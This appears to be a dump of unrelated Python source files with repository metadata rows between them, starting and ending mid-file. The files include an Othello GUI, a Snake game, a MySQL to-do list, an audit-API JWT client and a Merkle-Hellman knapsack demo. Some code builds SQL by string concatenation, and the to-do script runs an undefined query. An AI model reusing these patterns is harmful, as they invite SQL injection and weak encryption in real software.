column_part += "`" + column + "`,"
column_part = re.sub(",$", "", column_part)
# 生成写入数据
value_list = []
for data in data:
val_item = "("
for column in column_list:
if column[0] in data and data[column[0]] is not None:
if column[1] == int or column[1] == float or column[1] == bool:
val_item += str(data[column[0]]) + ","
else:
val_item += "'" + str(data[column[0]]).replace("'", "") + "',"
else:
if column[1] == int or column[1] == float:
val_item += "0,"
else:
val_item += "'',"
val_item = re.sub(",$", ")", val_item)
value_list.append(val_item)
return "INSERT INTO " + table + " (" + column_part + ") VALUES " + ",".join(value_list) # 拼接SQL语句
| true |
70650e335045e2d7edc9f20555b82eaee1d37d41
|
Python
|
msabrishami/EE559_discussion1
|
/test1.py
|
UTF-8
| 86 | 2.5625 | 3 |
[] |
no_license
|
# This is our first python code
print "Hellow World!"
print "Its nice to be here"
| true |
ce465f049296bbc7fb0c80bedb5aa39a0ab4bae3
|
Python
|
shimomura314/non-bit-reversi
|
/gui.py
|
UTF-8
| 9,413 | 2.890625 | 3 |
[
"MIT"
] |
permissive
|
"""GUI."""
import copy
import time
import wx
from color import color_pallet as cp
from menu import MenuBar
import othello
class MyFrame(wx.Frame):
"""Make frame for GUI."""
def __init__(self, parent=None, id=-1, title=None, size=(640, 480), othello=None):
wx.Frame.__init__(self, parent, id, title, size=size)
self.othello = othello
self.result = False
# Initialize status bar
self.CreateStatusBar()
self.SetStatusText("status bar")
self.GetStatusBar().SetBackgroundColour(None)
# Initialize menu bar
self.SetMenuBar(MenuBar(self))
# Set panels
self._game_panel = GamePanel(self)
self._user_panel = UserPanel(self)
layout = wx.BoxSizer(wx.HORIZONTAL)
layout.Add(self._game_panel, proportion=3, flag=wx.EXPAND)
layout.Add(self._user_panel, proportion=1, flag=wx.EXPAND)
self.SetSizer(layout)
self._timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.on_timer)
self._timer.Start(100)
self.user_auto = False
return
def on_timer(self, event):
self.result = self.othello.process_game()
return
class GamePanel(wx.Panel):
def __init__(self, frame):
wx.Panel.__init__(self, frame)
self.SetBackgroundColour("white")
self._frame = frame
self._disks = [[None for _ in range(8)] for _ in range(8)]
self._position = [[(row*30, column*30) for column in range(8)] for row in range(8)]
self._line_position = [[0 for _ in range(9)] for _ in range(2)]
# Set board and disks
for row in range(8):
for column in range(8):
self._disks[row][column] = Disk()
self._square = SquareMap()
self._client_DC = wx.ClientDC(self)
self._timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.on_timer)
self.Bind(wx.EVT_LEFT_DOWN, self.on_left_down)
self._timer.Start(100)
return
def on_left_down(self, event):
"""If a disk area was clicked, return the position of disk."""
different = self._line_position[0][1] - self._line_position[0][0]
select_x = (event.X - self._line_position[0][0])//different
select_y = (event.Y - self._line_position[1][0])//different
return self._frame.othello.choice_player(int(select_x+1), int(select_y+1))
def update_data(self):
"""Get the size of panel and calculate the size of board."""
width, height = self.GetSize()
BOARD_SIZE = min(width, height)*0.7
DISK_SIZE = (BOARD_SIZE/7)*0.7/2
self._board = self._frame.othello.display_board()
self._width = width
self._height = height
self._BOARD_SIZE = BOARD_SIZE
self._DISK_SIZE = DISK_SIZE
self._position = [
[(width/2 - BOARD_SIZE/2 + row*BOARD_SIZE/7, height/2 - BOARD_SIZE/2 + column*BOARD_SIZE/7) for column in range(8)] for row in range(8)
]
self._line_position = [
[width/2 + (x-4)*BOARD_SIZE/7 for x in range(9)],
[height/2 + (x-4)*BOARD_SIZE/7 for x in range(9)]
]
def draw_board(self):
"""Determine disks" position and draw area."""
self._bit_map = wx.Bitmap(self._width, self._height)
self._buffer_DC = wx.BufferedDC(self._client_DC, self._bit_map)
self._buffer_DC.Clear()
self._square.draw(self._buffer_DC, self._line_position)
for row in range(8):
for column in range(8):
if self._board[row][column] == 1:
self._disks[row][column].draw(cp.COLOR_BLACK_DISK, self._buffer_DC, self._position[row][column], self._DISK_SIZE)
elif self._board[row][column] == -1:
self._disks[row][column].draw(cp.COLOR_WHITE_DISK, self._buffer_DC, self._position[row][column], self._DISK_SIZE)
else:
self._disks[row][column].draw(cp.COLOR_BOARD, self._buffer_DC, self._position[row][column], self._DISK_SIZE)
self._client_DC.DrawBitmap(self._bit_map, 0, 0)
def on_timer(self, event):
self.update_data()
self.draw_board()
class UserPanel(wx.Panel):
def __init__(self, frame):
super().__init__()
wx.Panel.__init__(self, frame)
self._frame = frame
self._user_point_panel = PointPanel(self, frame, cp.COLOR_PANEL_PLAYER, 1)
self._CPU_point_panel = PointPanel(self, frame, cp.COLOR_PANEL_CPU, -1)
self._result_panel = ResultPanel(self, frame)
layout = wx.BoxSizer(wx.VERTICAL)
layout.Add(self._user_point_panel, proportion=1, flag=wx.EXPAND)
layout.Add(self._CPU_point_panel, proportion=1, flag=wx.EXPAND)
layout.Add(self._result_panel, proportion=1, flag=wx.EXPAND)
self.SetSizer(layout)
self._timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.on_timer)
self._timer.Start(100)
return
def on_timer(self, event):
"""Determine disks' position and draw area."""
self._user_point_panel.draw(self._frame.othello.count_player)
self._CPU_point_panel.draw(self._frame.othello.count_CPU)
self._result_panel.draw()
class PointPanel(wx.Panel):
def __init__(self, panel, frame, back_color:str, is_player:int):
super().__init__()
wx.Panel.__init__(self, panel)
self.SetBackgroundColour(back_color)
self._is_player = is_player
self._frame = frame
if is_player == 1:
self._text = "You"
else:
self._text = "CPU"
self._client_DC = wx.ClientDC(self)
def draw(self, point:int):
"""Show each player's points."""
width, height = self.GetSize()
size = min(width, height)
if self._is_player * self._frame.othello._player_color == 1:
color = cp.COLOR_BLACK_DISK
else:
color = cp.COLOR_WHITE_DISK
self._bit_map = wx.Bitmap(width, height)
self._buffer_DC = wx.BufferedDC(self._client_DC, self._bit_map)
self._buffer_DC.Clear()
self._buffer_DC.SetPen(wx.Pen(color))
self._buffer_DC.SetBrush(wx.Brush(color))
self._buffer_DC.DrawCircle(width/3, height/2, size*0.2)
self._buffer_DC.SetFont(wx.Font(size*0.175, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
self._buffer_DC.DrawText("×" + str(point), width*0.55, height/2)
self._buffer_DC.DrawText(self._text, width*0.55, height*0.3)
self._client_DC.DrawBitmap(self._bit_map, 0, 0)
return
class ResultPanel(wx.Panel):
def __init__(self, panel, frame):
super().__init__()
wx.Panel.__init__(self, panel)
self._frame = frame
self._text = ""
self._client_DC = wx.ClientDC(self)
def draw(self):
width, height = self.GetSize()
size = min(width, height)
if self._frame.result:
self._text = self._frame.othello.result
else:
self._text = ""
self._bit_map = wx.Bitmap(width, height)
self._buffer_DC = wx.BufferedDC(self._client_DC, self._bit_map)
self._buffer_DC.Clear()
self._buffer_DC.SetPen(wx.Pen("black"))
self._buffer_DC.SetBrush(wx.Brush("black"))
self._buffer_DC.SetFont(wx.Font(size*0.175, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
self._buffer_DC.DrawText(self._text, width*0.5, height/2)
self._client_DC.DrawBitmap(self._bit_map, 0, 0)
return
class Disk(object):
def __init__(self):
return
def draw(self, color:str, buffer_DC, position:tuple, size:float):
buffer_DC.SetPen(wx.Pen(color))
buffer_DC.SetBrush(wx.Brush(color))
buffer_DC.DrawCircle(position, size)
return
class SquareMap(object):
def __init__(self):
return
def draw(self, buffer_DC, line_position:list):
edge_length = line_position[0][-1] - line_position[0][0]
buffer_DC.SetPen(wx.Pen(cp.COLOR_BOARD_EDGE))
buffer_DC.SetBrush(wx.Brush(cp.COLOR_BOARD_EDGE))
buffer_DC.DrawRectangle(
line_position[0][0] - edge_length*0.05, line_position[1][0] - edge_length*0.05,
edge_length*1.1, edge_length*1.1
)
buffer_DC.SetPen(wx.Pen(cp.COLOR_BOARD))
buffer_DC.SetBrush(wx.Brush(cp.COLOR_BOARD))
buffer_DC.DrawRectangle(
line_position[0][0] - edge_length*0.025, line_position[1][0] - edge_length*0.025,
edge_length*1.05, edge_length*1.05
)
buffer_DC.SetPen(wx.Pen(cp.COLOR_BOARD_LINE))
buffer_DC.SetBrush(wx.Brush(cp.COLOR_BOARD_LINE))
for row in range(9):
for column in range(9):
buffer_DC.DrawLine(
line_position[0][row], line_position[1][0],
line_position[0][row], line_position[1][-1]
)
buffer_DC.DrawLine(
line_position[0][0], line_position[1][column],
line_position[0][-1], line_position[1][column]
)
for row in range(1, 8):
for column in range(1, 8):
buffer_DC.DrawCircle(line_position[0][row], line_position[1][column], edge_length*0.005)
return
| true |
eb99c0b19214c53c472654bf7a9dc618dc4e4b5f
|
Python
|
saurabh-mani/ToDoList
|
/to-do-list-1.0.py
|
UTF-8
| 1,111 | 3.140625 | 3 |
[] |
no_license
|
import mysql.connector
#Connection to MySQL
mydb = mysql.connector.connect(host='localhost',user='username',passwd='password',database='ToDoList')
#cursor
mycursor = mydb.cursor()
print("1. List all records")
print("2. List pending")
print("3. Mark done")
print("4. Add entry")
operation = input("Choose an operation:")
if operation=='1':
qry = "Select * from todolist;"
elif operation=='2':
qry = "Select * from todolist where Flag = 1"
elif operation=='3':
entryid = int(input("Enter Entry Id: "))
qry = ("update todolist set Flag = 0 where EntryId = "+str(entryid)+";")
mycursor.execute(qry)
mydb.commit()
elif operation=='4':
title = input("Title: ")
desc = input("Description: ")
mycursor.execute(qry)
mydb.commit()
if(operation=='1' or operation=='2'):
mycursor.execute(qry)
print("--------------------------------------------------------")
print("Entry Id|Title\t\t|Description")
print("--------+---------------+--------------------------------")
for i in mycursor:
print(str(i[0])+"\t|"+i[1]+"\t|"+i[2])
print("--------------------------------------------------------")
| true |
7d46b9f184bf46a9c5abdcbd83ae4fd7772908f8
|
Python
|
virtru/audit-export-client
|
/auditexport/auditclient/auditclient.py
|
UTF-8
| 4,704 | 2.734375 | 3 |
[
"MIT"
] |
permissive
|
import random
import hashlib
import base64
import binascii
import requests
import jwt
import time
import sys
import logging
from binascii import Error
from . import errors
logger = logging.getLogger(__name__)
VJWT_TTL_SECONDS = 300.0
API_HOST = 'audit.virtru.com'
API_PATH = '/api/messages'
class AuditClient:
"""Audit Client for fetching audit records."""
def __init__(self, apiTokenSecret, apiTokenId, apiHost=API_HOST, apiPath=API_PATH):
""" AuditClient class constructor
Arguments:
apiTokenSecret {String} -- The apiTokenSecret provided by Virtru.
apiTokenId {String} -- The apiTokenId proviced by Virtru.
apiHost {[String]} -- The apiHost. Defaults to audit.virtru.com.
apiPath {[String]} -- The apiPath. Defaults to /api/messages.
"""
self.apiTokenSecret = apiTokenSecret
self.apiTokenId = apiTokenId
self.apiHost = apiHost
self.apiPath = apiPath
def fetchRecords(self, req):
""" Fetch audit records
Arguments:
req {Dictionary} -- request Dictionary
e.g. {
method: GET,
query: {
start: 2000,
end: 2018
}
}
Returns:
Dictionary -- repsponse object
The response dictionary has the following format:
{
docs: [{Dictonary}],
nextPageStartKey: {String}
}
"""
vjwtString = self._generateVjwtString(req)
headers = {
'Authorization': 'VJWTv1.0.0 ' + vjwtString.decode(),
'Connection': 'close'
}
apiUrl = self.apiHost + self.apiPath
response = requests.get("https://" + apiUrl,
params=req['query'], headers=headers)
self._validateResponse(response.status_code)
return response.json()
def _validateResponse(self, statusCode):
"""Validates response """
def status401():
raise errors.InvalidCredentialsError()
def default():
raise errors.ClientConnectionError(statusCode)
def status200():
pass
def switch(arg):
switcher = {
401: status401,
403: status401,
200: status200
}
switcher.get(arg, default)()
switch(statusCode)
def _generateVjwtString(self, req):
"""Generate vjwt authorization string to be included in authorization of requests
Arguments:
req {Dictonary} -- request dictionary.
Returns:
String -- The authorization string.
"""
try:
tokenSecret = base64.b64decode(self.apiTokenSecret)
except (TypeError, binascii.Error) as err:
raise errors.InvalidCredentialsError(
'The provided ApiSecret/ApiId are invalid')
method = req['method']
queryKeys = req['query'].keys()
queryParams = self._generateQueryParams(req['query'], queryKeys)
nonce = self._generateNonce()
payload = {
'sub': self.apiTokenId,
'iat': int(time.time()),
'jti': nonce,
'rsha': self._generateRsha(method, self.apiHost, self.apiPath, queryParams),
'rqps': ','.join(queryKeys),
'exp': int(time.time()+VJWT_TTL_SECONDS)
}
return jwt.encode(payload, tokenSecret, algorithm='HS256')
def _generateQueryParams(self, query, keys):
"""Generate string of query
Arguments:
query {OrderedDict} -- dictionary containing query params.
e.g. {
start: 2000,
end: 2019
}
key {List} -- List of keys
Returns:
String -- query string. e.g. start=2000end==2019
"""
result = ''
for key in keys:
result = result+'%s=%s' % (key, query[key])
return result
def _generateNonce(self, length=8):
"""Generate nonce"""
return ''.join([str(random.randint(0, 9)) for i in range(length)])
def _generateRsha(self, method, host, path, queryParams):
"""Generate Base64UrlEncode of SHA256 hash of the Method + host + path + query params + headers"""
hash = hashlib.sha256(
(method + host + path + queryParams).encode('utf-8')).digest()
b64Hash = base64.urlsafe_b64encode(hash)
# Remove padding
b64Hash = b64Hash.decode().replace('=', '')
return b64Hash
| true |
1bb2542c2251001f68f2670136fb1b90de646585
|
Python
|
jb26444/lazynet
|
/Python/Learning/square_1.py
|
UTF-8
| 645 | 3.875 | 4 |
[] |
no_license
|
import turtle
def draw():
brad = turtle.Turtle()
brad.shape("turtle")
brad.color("blue")
brad.speed(2)
offset = 0
brad1 = 0
while ( brad1 < 25 ):
brad.right(offset)
brad.forward(100)
brad.right(90)
brad.forward(100)
brad.right(90)
brad.forward(100)
brad.right(90)
brad.forward(100)
brad.right(90)
offset = offset + 25
brad1 = brad1 + 1
def draw_square():
window = turtle.Screen()
window.bgcolor("red")
square = 0
while (square < 1):
draw()
square = square + 1
draw_square()
| true |
3cdaed0736b8eb6ad45719659d45a2bbf3dff21f
|
Python
|
artemmarkaryan/price_checker
|
/database/facade/user.py
|
UTF-8
| 210 | 2.53125 | 3 |
[] |
no_license
|
from database.models import User, Platform
def get_or_create(user_id: int, platform: str) -> User:
platform = Platform.get(name=platform)
return User.get_or_create(user_id=user_id, platform=platform)
| true |
a7ab3180d0059ea8f2e4cf069e99146d3d938cfd
|
Python
|
joyzhaoyang/Financial-Computing-III
|
/FC3_HW2_Q1_Merkle-Hellman_Knapsack_Cryptosystem.py
|
UTF-8
| 3,092 | 3.84375 | 4 |
[] |
no_license
|
"""
This file: FC3HW2Prob1.py
Programmer: Joy Zhao (yangzhao@tepper.cmu.edu)
Course/Section: 46-903
Assignment: Homework2, Problem1
Description: Merkle-Hellman Knapsack Cryptosystem
Performing key generation, encryption and decryption and using Python lists.
Methods: http://en.wikipedia.org/wiki/Merkle%E2%80%93Hellman_knapsack_cryptosystem
Last Modified: 04/08/15
Known Bugs: fixed keys as suggested in Discussion Board
"""
"""
Comments:
The best case and worst case computational complexity
of both the encryption and decryption process is O(n),
where n is the size of text.
I write a very simple program here. Encryption is performed
character by character of the string, and the results are stored
in a list of integers, each integer is the code for a character.
Similarly, decryption is also performance character by character.
"""
""" Get input string """
str_input = raw_input('Enter a string and I will encrypt it as single large integer.')
while len(str_input) >= 80: # if string is too long, try again
str_input = raw_input('Enter a string of fewer than 80 characters in length, try again')
""" Initiate keys, source: wikipedia """
w = [2,7,11,21,42,89,180,354] # basis for private key
q = 881 # modulus
r = 588 # multiplier
b = [] # public key
# generate public key
for i in range(len(w)):
b.append(w[i]*r%q) # public key
""" Encryption """
codes = [] # list of intergers, each representing encryption of each character
for c in str_input:
bin_str = format(ord(c), 'b')
if len(bin_str)==7: # eight digits binary code of character
bin_str = "0"+format(ord(c), 'b')
elif len(bin_str)==6:
bin_str = "00"+format(ord(c), 'b')
# print(bin_str)
code = 0
for i in range(len(bin_str)):
code = code + int(bin_str[i])*b[i]
codes.append(code)
""" Print results of Encryption"""
print "Clear text:"
print str_input
print "Number of clear text bytes = ", len(str_input)
print str_input, "is encrypted as "
print ''.join(map(str, codes))
""" Modular inverse """
# source: http://rosettacode.org/wiki/Modular_inverse#Python
def extended_gcd(aa, bb):
lastremainder, remainder = abs(aa), abs(bb)
x, lastx, y, lasty = 0, 1, 1, 0
while remainder:
lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
x, lastx = lastx - quotient*x, x
y, lasty = lasty - quotient*y, y
return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)
def modinv(a, m):
g, x, y = extended_gcd(a, m)
if g != 1:
raise ValueError
return x % m
""" Decryption """
s = modinv(r, q);
str_output = ""
for i in range(len(codes)):
c = codes[i]*s%q
bin_out = ""
for j in range(len(w)):
if c-w[len(w)-j-1]>=0:
c = c-w[len(w)-j-1]
bin_out = "1" + bin_out
else:
bin_out = "0" + bin_out
str_output = str_output+chr(int(bin_out, 2)) # convert to character
""" Print results of Decryption """
print "Result of decryption: ", str_output
""" The fix """
raw_input("Press enter to exit")
| true |
74c5bd78f50d96f1f32a8ebddd3d9cfed64d1788
|
Python
|
vsupe/jobeasy_snake_game
|
/snake.py
|
UTF-8
| 6,202 | 3.15625 | 3 |
[] |
no_license
|
import sys
from time import sleep
import pygame
from random import randrange
# Window
WINDOW_HEIGHT = 480
WINDOW_WIDTH = 640
SNAKE_COLOR = (0, 255, 0)
FOOD_COLOR = (255, 0, 0)
BACKGROUND_COLOR = (0, 0, 0)
FONT_COLOR = (255, 255, 255)
DIFFICULTY = {
'easy': 10,
'medium': 25,
'hard': 40
}
class Game:
def __init__(self):
"""
Init class variables for game
"""
self.game = pygame
self.game.init()
self.game.display.set_caption('Snake')
# FPS (frames per second) controller
self.fps = pygame.time.Clock()
self.snake = Snake()
self.food = Food()
self.score = Score()
self.window = Window(self.game.display.set_mode(size=(WINDOW_WIDTH, WINDOW_HEIGHT)))
def game_over(self):
# 1 Head outside of the screen
if self.snake.snake_head[0] < 0 or self.snake.snake_head[0] > WINDOW_WIDTH - 10:
self.window.draw_game_over(self.game, self.exit_game)
elif self.snake.snake_head[1] < 0 or self.snake.snake_head[1] > WINDOW_HEIGHT - 10:
self.window.draw_game_over(self.game, self.exit_game)
# 2 Snake crushed its body
for block in self.snake.snake_body[1:]:
if block[0] == self.snake.snake_head[0] and block[1] == self.snake.snake_head[1]:
self.window.draw_game_over(self.game, self.exit_game)
def exit_game(self):
self.game.quit()
sys.exit()
def turn(self):
self.snake.snake_move()
if self.snake.snake_head[0] == self.food.food[0] and self.snake.snake_head[1] == self.food.food[1]:
self.snake.snake_grown()
self.food.food_respawn()
self.score.increase_score()
def run(self):
while True:
for event in self.game.event.get():
if event.type == self.game.QUIT:
self.exit_game()
elif event.type == self.game.KEYDOWN:
if event.key == self.game.K_ESCAPE:
self.exit_game()
else:
if event.key == self.game.K_DOWN or event.key == self.game.K_s:
self.snake.snake_change_direction('DOWN')
if event.key == self.game.K_UP or event.key == self.game.K_w:
self.snake.snake_change_direction('UP')
if event.key == self.game.K_LEFT or event.key == self.game.K_a:
self.snake.snake_change_direction('LEFT')
if event.key == self.game.K_RIGHT or event.key == self.game.K_d:
self.snake.snake_change_direction('RIGHT')
self.turn()
self.game_over()
self.window.draw_stage()
self.window.draw_snake(self.game, self.snake.snake_body)
self.window.draw_food(self.game, self.food.food)
self.window.draw_score(self.game, self.score.score)
self.game.display.update()
self.fps.tick(DIFFICULTY['easy'])
class Snake:
def __init__(self):
self.snake_direction = 'RIGHT'
self.snake_head = [100, 50]
self.snake_body = [
self.snake_head,
[self.snake_head[0] - 10, self.snake_head[1]],
[self.snake_head[0] - 20, self.snake_head[1]],
]
def snake_change_direction(self, new_snake_direction: str):
if new_snake_direction == self.snake_direction:
return
if self.snake_direction == 'UP' and new_snake_direction == 'DOWN':
return
if self.snake_direction == 'DOWN' and new_snake_direction == 'UP':
return
if self.snake_direction == 'LEFT' and new_snake_direction == 'RIGHT':
return
if self.snake_direction == 'RIGHT' and new_snake_direction == 'LEFT':
return
self.snake_direction = new_snake_direction
def snake_move(self):
if self.snake_direction == 'UP':
self.snake_head = [self.snake_head[0], self.snake_head[1] - 10]
elif self.snake_direction == 'DOWN':
self.snake_head = [self.snake_head[0], self.snake_head[1] + 10]
elif self.snake_direction == 'RIGHT':
self.snake_head = [self.snake_head[0] + 10, self.snake_head[1]]
elif self.snake_direction == 'LEFT':
self.snake_head = [self.snake_head[0] - 10, self.snake_head[1]]
self.snake_body.insert(0, self.snake_head)
self.snake_body.pop()
def snake_grown(self):
self.snake_body.insert(0, self.snake_head)
self.snake_move()
class Food:
def __init__(self):
self.food = [200, 200]
def food_respawn(self):
self.food = [randrange(1, WINDOW_WIDTH // 10) * 10, randrange(1, WINDOW_HEIGHT // 10) * 10]
class Score:
def __init__(self):
self.score = 0
def increase_score(self):
self.score += 10
class Window:
def __init__(self, window):
self.window = window
def draw_stage(self):
self.window.fill(BACKGROUND_COLOR)
def draw_snake(self, game, snake_body):
for part in snake_body:
game.draw.rect(self.window, SNAKE_COLOR, game.Rect(part[0], part[1], 10, 10))
def draw_food(self, game, food):
game.draw.rect(self.window, FOOD_COLOR, game.Rect(food[0], food[1], 10, 10))
def draw_score(self, game, score):
SCORE_FONT = game.font.SysFont('Times New Roman', 20)
score_surface = SCORE_FONT.render(f'Score: {score}', True, FONT_COLOR)
score_rect = score_surface.get_rect()
score_rect.midtop = (WINDOW_WIDTH // 2, 15)
self.window.blit(score_surface, score_rect)
def draw_game_over(self, game, exit_game):
SCORE_FONT = game.font.SysFont('Times New Roman', 60)
score_surface = SCORE_FONT.render(f'GAME OVER', True, FOOD_COLOR)
score_rect = score_surface.get_rect()
score_rect.midtop = (WINDOW_WIDTH // 2, WINDOW_HEIGHT // 2 - 30)
self.window.fill(BACKGROUND_COLOR)
self.window.blit(score_surface, score_rect)
game.display.update()
sleep(3)
exit_game()
| true |
592a93202545cc27955482b5ec82800ea78012e3
|
Python
|
JiahangGu/leetcode
|
/DFS+BFS/src/20-10-16-207-course-schedule.py
|
UTF-8
| 2,423 | 3.6875 | 4 |
[] |
no_license
|
#!/usr/bin/env python
# encoding: utf-8
# @Time:2020/10/16 11:52
# @Author:JiahangGu
from typing import List
class Solution:
def canFinish(self, numCourses: int, prerequisites: List[List[int]]) -> bool:
"""
判断图中是否存在环,使用拓扑排序判断。BFS方法求解拓扑排序时,每次在弹出队首元素后,
将所有邻点的结点入度-1,并将入度为0的结点放入队列中。弹出队列的元素顺序就是拓扑序。如果结点个数
少于n,则存在环(循环提前终止)。
:param numCourses:
:param prerequisites:
:return:
"""
# from collections import defaultdict
# edges = defaultdict(list)
# degree = defaultdict(int)
# for t, f in prerequisites:
# edges[f].append(t)
# degree[t] += 1
# queue = [i for i in range(numCourses) if degree[i] == 0]
# count = 0
# while queue:
# cur = queue.pop(0)
# count += 1
# for x in edges[cur]:
# degree[x] -= 1
# if degree[x] == 0:
# queue.append(x)
# return count == numCourses
"""
DFS解法。由于DFS会从一个起点开始遍历到无法继续前进才停止,所以更重要的是结点的出度。当出度为0时就不再深搜。同时为了避免陷入环,
需要使用一个状态数组标记结点的访问状态。如果待访问结点正在被访问,则说明存在环。如果未被访问,则继续递归搜索。如果已被访问则跳过。
"""
def dfs(pos):
nonlocal flag
visit[pos] = 1
for x in edges[pos]:
if visit[x] == 1:
flag = False
return
elif visit[x] == 0:
dfs(x)
if not flag:
return
visit[pos] = 2
flag = True
visit = [0] * numCourses
from collections import defaultdict
edges = defaultdict(list)
degree = defaultdict(int)
for t, f in prerequisites:
edges[f].append(t)
degree[f] += 1
for i in range(numCourses):
if flag and visit[i] == 0:
dfs(i)
return flag
s = Solution()
print(s.canFinish(2, [[1,0],[0,1]]))
| true |
d1f4d55299894d251eb48076873f246c5778fe4b
|
Python
|
jdassonvil/OpenClassRoom
|
/table7_deffonction.py
|
UTF-8
| 132 | 3.21875 | 3 |
[] |
no_license
|
def table(nb):
i=0
while i<10:
print(i+1,"*",nb,"=",(i+1)*nb)
i+=1
print("merci beau gosse !")
table(8)
| true |
fccc8174cd7607146fe3b03e8e02ce07c02f3635
|
Python
|
nodepy/nodepy
|
/src/nodepy/utils/path/urlpath.py
|
UTF-8
| 4,055 | 2.53125 | 3 |
[
"MIT"
] |
permissive
|
# The MIT License (MIT)
#
# Copyright (c) 2017-2018 Niklas Rosenstein
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
A #pathlib.Path implementation for URLs.
"""
import io
import os
import pathlib2 as pathlib
import posixpath
import six
try:
from urllib.request import urlopen
from urllib.parse import urlparse, urlunparse
except ImportError:
from urllib2 import urlopen
from urlparse import urlparse, urlunparse
class _UrlFlavour(pathlib._PosixFlavour):
sep = '/'
altsep = ''
has_drv = False
pathmod = posixpath
is_supported = True
def splitroot(self, part, sep=sep):
res = urlparse(part)
return (
res.scheme + '://' if res.scheme else '',
res.netloc + '/' if res.netloc else '',
urlunparse(('', '', res.path, res.params, res.query, res.fragment))
)
class PureUrlPath(pathlib.PurePath):
_flavour = _UrlFlavour()
__slots__ = ()
def absolute(self):
return self
def is_absolute(self):
return True
class UrlPath(pathlib.Path, PureUrlPath):
__slots__ = ()
# Wrapper for the socket._fileobject returned from #urlopen().
# Necessary in Python 2 because socket._fileobject does not support
# readable(), writable() and seekable(), and without this protocol it
# can not be wrapped in #io.BufferedReader or #io.TextIOWrapper.
class _readable(object):
def __init__(self, fp, seekable=False):
self._fp = fp
self._seekable = seekable
self._closed = False
def __getattr__(self, name):
return getattr(self._fp, name)
def readable(self):
return True
def writable(self):
return False
def seekable(self):
return self._seekable
def owner(self):
raise NotImplementedError("Path.owner() is unsupported for URLs")
def group(self):
raise NotImplementedError("Path.group() is unsupported for URLs")
def open(self, flags='r', mode=0o666):
if set(flags).difference('rbt'):
raise IOError('URLs can be opened in read-mode only.')
if six.PY2:
fp = self._readable(urlopen(str(self)).fp)
else:
fp = urlopen(str(self))
if not isinstance(fp, io.BufferedReader):
fp = io.BufferedReader(fp)
if 'b' not in flags:
fp = io.TextIOWrapper(fp)
return fp
def is_dir(self):
return False
def is_file(self):
return True
def exists(self):
return True
def is_symlink(self):
return False
def is_socket(self):
return False
def is_fifo(self):
return False
def is_char_device(self):
return False
def is_block_device(self):
return False
def resolve(self, strict=False):
return self
def iterdir(self):
raise NotImplementedError
def make(s, pure=False):
"""
If *s* is a valid URL with a scheme and netloc, returns an #UrlPath or
#PureUrlPath (depending on *pure*). Otherwise, a #ValueError is raised.
"""
if isinstance(s, six.string_types):
res = urlparse(s)
if res.scheme and res.netloc:
return PureUrlPath(s) if pure else UrlPath(s)
raise ValueError('not a URL: {!r}'.format(s))
| true |
7697c03ccbf86647c1cb6738e0b908a4c27de193
|
Python
|
wcmaclean/home-repo
|
/Python_Ruby/surf_spy_client_server/surf_spy_client.py
|
UTF-8
| 514 | 2.59375 | 3 |
[] |
no_license
|
# surf_spy_client.py
#
# Will MacLean
# CSPP 51060
# Final Project
#
import socket
import sys
# variables, for ease of editing
host = 'localhost'
port = 56767
backlog = 5
size = 16384
# grab hostname from command-line input
if (len(sys.argv) == 2):
host = sys.argv[1]
else:
pass
# create socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.connect((host, port))
while True:
data = s.recv(size)
print "Surfing: ", data
s.close()
| true |
7cfe75f4eb6c03dbe9bb938954ca3a48601943b6
|
Python
|
muthazhagu/EPA
|
/ViolationRecord.py
|
UTF-8
| 2,371 | 2.6875 | 3 |
[] |
no_license
|
from decimal import Decimal
class ViolationRecord:
"""
This class encapsulates the recommendation data.
"""
def __init__(self):
self.year = ''
self.state = ''
self.efsi = ''
self.fsn = ''
self.lead_latest, self.lead_mean = 'no data', 'no data'
self.co_latest, self.co_mean = 'no data', 'no data'
self.nox_latest, self.nox_mean = 'no data', 'no data'
self.pmpri_latest, self.pmpri_mean = 'no data', 'no data'
self.so2_latest, self.so2_mean = 'no data', 'no data'
self.voc_latest, self.voc_mean = 'no data', 'no data'
self.in_violation = 'N'
def update_in_violation(self):
"""
This method does not return anything.
It compares the data from the latest year, to the mean of the data from the previous years,
and sets the in_violation property to Y, if in violation (i.e. needs recommendation).
It sets the in_violation property to Y, if and only if ALL of the following conditions are satisfied -
1. Latest year's data is not the same as the mean of the previous years' data.
2. Latest year's data is not 'no data'
3. Mean is not 'no data'
4. Latest year's data is greater than the mean of the previous years' data.
"""
latest = [self.lead_latest, self.co_latest, self.nox_latest, self.pmpri_latest, self.so2_latest, self.voc_latest]
mean = [self.lead_mean, self.co_mean, self.nox_mean, self.pmpri_mean, self.so2_mean, self.voc_mean]
latest_and_mean = list(zip(latest, mean))
for tup in latest_and_mean:
if not tup[0] == tup[1]:
if not tup[0] == 'no data':
val1 = Decimal(tup[0])
if not tup[1] == 'no data':
val2 = Decimal(tup[1])
if val1 and val2:
if val1 > val2:
self.in_violation = 'Y'
def __str__(self):
return ','.join([self.efsi, self.fsn, self.state, self.year, self.lead_latest, self.lead_mean,
